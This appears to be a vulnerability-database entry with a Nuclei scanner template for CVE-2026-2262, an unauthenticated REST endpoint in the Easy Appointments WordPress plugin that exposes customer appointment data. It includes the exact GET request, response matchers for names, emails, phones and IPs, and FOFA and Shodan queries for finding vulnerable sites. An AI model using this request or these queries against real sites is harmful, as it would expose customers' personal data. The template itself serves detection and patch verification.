Easy Appointments <= 3.12.21 - Information Disclosure
CVE-2026-2262
Verified
Description
Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.
Severity
High
CVSS Score
7.5
Exploit Probability
2%
Published Date
April 21, 2026
Template Author
0x_akoko
CVE-2026-2262.yaml
id: CVE-2026-2262
info:
name: Easy Appointments <= 3.12.21 - Information Disclosure
author: 0x_Akoko
severity: high
description: |
Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.
impact: |
Unauthenticated attackers can access sensitive customer data, including names, emails, phone numbers, IPs, descriptions, and pricing, risking privacy and data leakage.
remediation: |
Update to the latest version of Easy Appointments plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-api
- https://nvd.nist.gov/vuln/detail/CVE-2026-2262
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-2262
epss-score: 0.0239
epss-percentile: 0.81958
cwe-id: CWE-284
cpe: cpe:2.3:a:motopress:easy_appointments:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/easy-appointments/"
shodan-query: http.html:"/wp-content/plugins/easy-appointments/"
tags: cve,cve2026,wordpress,wp,wp-plugin,exposure,easy-appointments
http:
- raw:
- |
GET /wp-json/wp/v2/eablocks/ea_appointments/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains_all(body, 'email', 'phone', 'ip', 'name')"
- "contains(content_type, 'application/json')"
- "status_code == 200"
condition: and
# digest: 490a0046304402206d6fe090d2f4202728d1a93919362615ef2499a2d1c8c6d2c2464ea52496d0060220261de12e0658c4eaff23a9fa1536712e17b8b344d22860fa4646b6ef80ba492b:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-2262
CWE ID:
cwe-284
Remediation Steps
Update to the latest version of Easy Appointments plugin.